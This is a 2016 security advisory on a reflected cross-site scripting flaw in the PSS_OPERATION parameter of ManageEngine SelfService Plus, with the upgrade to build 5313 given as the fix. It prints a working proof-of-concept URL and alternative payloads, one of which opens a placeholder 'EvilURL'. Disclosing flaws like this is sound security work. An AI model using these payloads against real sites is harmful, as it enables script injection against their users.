ManageEngine SelfService Plus Cross Site Scripting
Posted on 06 June 2016
# Exploit Title: Reflected XSS in ManageEngine SelfService Plus - 0day - Confirmed # Google Dork: N/A # Date: 29/5/2016 # Exploit Author: Mohamed Saeed # Contact: http://twitter.com/krmalab # Website: http://www.dts-solution.com # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: >= ManageEngine SelfService Plus build 5312 (Mar 2016) # Tested on: Affected browser’s: All - Tested on FireFox 44.0.2 . # CVE : N/A (ManageEngine Not in CVE-ID Covered Products) # Category: webapps Reflected XSS: ============= GET URL : http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock Vulnerable Parameter : PSS_OPERATION Exploit: http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock<button/onclick=alert(1)>DTS<>/button> Notes: ===== There is some filter mechanisim in place Not all XSS payload will work. Other XSS Payloads : ================== 0x00. "><img src=x onerror=window.open('EvilURL');> 0x01. <p/onmouseover=javascript:alert(1);>DTS</p> Refrences: ========= 0x00. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 0x01. https://www.owasp.org/index.php/XSS_Attacks Solution: ======== Upgrade to latest version (build 5313) About US: ========= DTS Solution Research and Security labs provide latest security updates, research and development, tool-kits and whitepapers around cyber security.
